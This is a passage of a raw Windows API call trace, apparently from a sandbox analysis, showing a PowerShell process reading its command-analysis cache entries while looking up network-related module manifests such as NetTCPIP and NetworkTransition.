0x0 [0282.564] CoTaskMemFree (pv=0x25b73cfa800) [0282.564] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d00e00 [0282.564] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d00e00 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.564] CoTaskMemFree (pv=0x25b73d00e00) [0282.564] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.564] GetCurrentProcess () returned 0xffffffffffffffff [0282.564] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa60) returned 1 [0282.565] GetTokenInformation (in: TokenHandle=0xa60, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.565] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984670 [0282.565] GetTokenInformation (in: TokenHandle=0xa60, TokenInformationClass=0x1, TokenInformation=0x25b73984670, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984670, ReturnLength=0x653ef8d6b8) returned 1 [0282.565] LocalFree (hMem=0x25b73984670) returned 0x0 [0282.566] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c81e248, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c81e248*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.566] CreateMutexW (lpMutexAttributes=0x25b5c81e398, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa64 [0282.566] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa64, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.566] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cff260 [0282.566] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cff260, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.566] CoTaskMemFree (pv=0x25b73cff260) [0282.566] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1", lpFilePart=0x0) returned 0x49 [0282.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.566] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\nettcpip\\nettcpip.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c81e9e0 | out: lpFileInformation=0x25b5c81e9e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x862)) returned 1 [0282.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.567] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.567] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.567] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_541ff8ef-26f3-4e66-a65d-16681e873d11", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_541ff8ef-26f3-4e66-a65d-16681e873d11", lpFilePart=0x0) returned 0x93 [0282.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.567] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_541ff8ef-26f3-4e66-a65d-16681e873d11" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_541ff8ef-26f3-4e66-a65d-16681e873d11"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa68 [0282.568] GetFileType (hFile=0xa68) returned 0x1 [0282.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.568] GetFileType (hFile=0xa68) returned 0x1 [0282.568] ReadFile (in: hFile=0xa68, lpBuffer=0x25b5c81fc68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c81fc68*, lpNumberOfBytesRead=0x653ef8d338*=0x1000, lpOverlapped=0x0) returned 1 [0282.573] ReadFile (in: hFile=0xa68, lpBuffer=0x25b5c821a29, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x653ef8d028, lpOverlapped=0x0 | out: lpBuffer=0x25b5c821a29*, lpNumberOfBytesRead=0x653ef8d028*=0x1b, lpOverlapped=0x0) returned 1 [0282.573] ReadFile (in: hFile=0xa68, lpBuffer=0x25b5c81fc68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d0b8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c81fc68*, lpNumberOfBytesRead=0x653ef8d0b8*=0x4c, lpOverlapped=0x0) returned 1 [0282.573] ReadFile (in: hFile=0xa68, lpBuffer=0x25b5c81fc68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c81fc68*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.573] CloseHandle (hObject=0xa68) returned 1 [0282.574] ReleaseMutex (hMutex=0xa64) returned 1 [0282.574] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1", lpFilePart=0x0) returned 0x6b [0282.574] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cff040 [0282.574] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cff040, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.574] CoTaskMemFree (pv=0x25b73cff040) [0282.574] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfdf40 [0282.574] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfdf40 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.574] CoTaskMemFree (pv=0x25b73cfdf40) [0282.574] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.574] GetCurrentProcess () returned 0xffffffffffffffff [0282.574] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa68) returned 1 [0282.575] GetTokenInformation (in: TokenHandle=0xa68, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.575] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984330 [0282.575] GetTokenInformation (in: TokenHandle=0xa68, TokenInformationClass=0x1, TokenInformation=0x25b73984330, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984330, ReturnLength=0x653ef8d6b8) returned 1 [0282.576] LocalFree (hMem=0x25b73984330) returned 0x0 [0282.576] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c8268a8, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c8268a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.576] CreateMutexW (lpMutexAttributes=0x25b5c8269f8, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa6c [0282.576] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa6c, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.576] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01680 [0282.576] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01680, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.576] CoTaskMemFree (pv=0x25b73d01680) [0282.576] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1", lpFilePart=0x0) returned 0x6b [0282.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.577] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkconnectivitystatus\\networkconnectivitystatus.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c827088 | out: lpFileInformation=0x25b5c827088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f6)) returned 1 [0282.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.577] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.577] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.577] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_ca974151-a96a-40b1-82ba-e2341ff23031", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_ca974151-a96a-40b1-82ba-e2341ff23031", lpFilePart=0x0) returned 0x93 [0282.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.577] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_ca974151-a96a-40b1-82ba-e2341ff23031" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_ca974151-a96a-40b1-82ba-e2341ff23031"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa70 [0282.578] GetFileType (hFile=0xa70) returned 0x1 [0282.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.578] GetFileType (hFile=0xa70) returned 0x1 [0282.578] ReadFile (in: hFile=0xa70, lpBuffer=0x25b5c828370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c828370*, lpNumberOfBytesRead=0x653ef8d338*=0x3ac, lpOverlapped=0x0) returned 1 [0282.581] ReadFile (in: hFile=0xa70, lpBuffer=0x25b5c828370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c828370*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.581] CloseHandle (hObject=0xa70) returned 1 [0282.581] ReleaseMutex (hMutex=0xa6c) returned 1 [0282.581] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1", lpFilePart=0x0) returned 0x61 [0282.581] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01680 [0282.581] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01680, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.581] CoTaskMemFree (pv=0x25b73d01680) [0282.581] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d01ce0 [0282.581] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d01ce0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.581] CoTaskMemFree (pv=0x25b73d01ce0) [0282.581] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.582] GetCurrentProcess () returned 0xffffffffffffffff [0282.582] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa70) returned 1 [0282.582] GetTokenInformation (in: TokenHandle=0xa70, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.582] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984530 [0282.582] GetTokenInformation (in: TokenHandle=0xa70, TokenInformationClass=0x1, TokenInformation=0x25b73984530, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984530, ReturnLength=0x653ef8d6b8) returned 1 [0282.583] LocalFree (hMem=0x25b73984530) returned 0x0 [0282.583] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c82c758, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c82c758*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.583] CreateMutexW (lpMutexAttributes=0x25b5c82c8a8, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa74 [0282.583] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa74, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.583] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfae60 [0282.583] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfae60, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.584] CoTaskMemFree (pv=0x25b73cfae60) [0282.584] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1", lpFilePart=0x0) returned 0x61 [0282.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.584] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkswitchmanager\\networkswitchmanager.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c82cf20 | out: lpFileInformation=0x25b5c82cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x87e)) returned 1 [0282.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.584] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.584] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.584] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_be72d563-9ed7-4ccb-b6c5-66a15b71dc5a", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_be72d563-9ed7-4ccb-b6c5-66a15b71dc5a", lpFilePart=0x0) returned 0x93 [0282.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.585] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_be72d563-9ed7-4ccb-b6c5-66a15b71dc5a" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_be72d563-9ed7-4ccb-b6c5-66a15b71dc5a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa78 [0282.585] GetFileType (hFile=0xa78) returned 0x1 [0282.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.585] GetFileType (hFile=0xa78) returned 0x1 [0282.585] ReadFile (in: hFile=0xa78, lpBuffer=0x25b5c82e1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c82e1f0*, lpNumberOfBytesRead=0x653ef8d338*=0xa6b, lpOverlapped=0x0) returned 1 [0282.589] ReadFile (in: hFile=0xa78, lpBuffer=0x25b5c82e1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c82e1f0*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.589] CloseHandle (hObject=0xa78) returned 1 [0282.589] ReleaseMutex (hMutex=0xa74) returned 1 [0282.589] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1", lpFilePart=0x0) returned 0x5b [0282.589] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01020 [0282.589] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01020, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.589] CoTaskMemFree (pv=0x25b73d01020) [0282.589] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfa800 [0282.589] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfa800 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.590] CoTaskMemFree (pv=0x25b73cfa800) [0282.590] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.590] GetCurrentProcess () returned 0xffffffffffffffff [0282.590] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa78) returned 1 [0282.590] GetTokenInformation (in: TokenHandle=0xa78, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.590] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984670 [0282.590] GetTokenInformation (in: TokenHandle=0xa78, TokenInformationClass=0x1, TokenInformation=0x25b73984670, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984670, ReturnLength=0x653ef8d6b8) returned 1 [0282.591] LocalFree (hMem=0x25b73984670) returned 0x0 [0282.591] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c833d80, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c833d80*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.591] CreateMutexW (lpMutexAttributes=0x25b5c833ed0, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa7c [0282.592] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa7c, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.592] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfc7e0 [0282.592] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfc7e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.592] CoTaskMemFree (pv=0x25b73cfc7e0) [0282.592] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1", lpFilePart=0x0) returned 0x5b [0282.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.592] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1" (normalized: 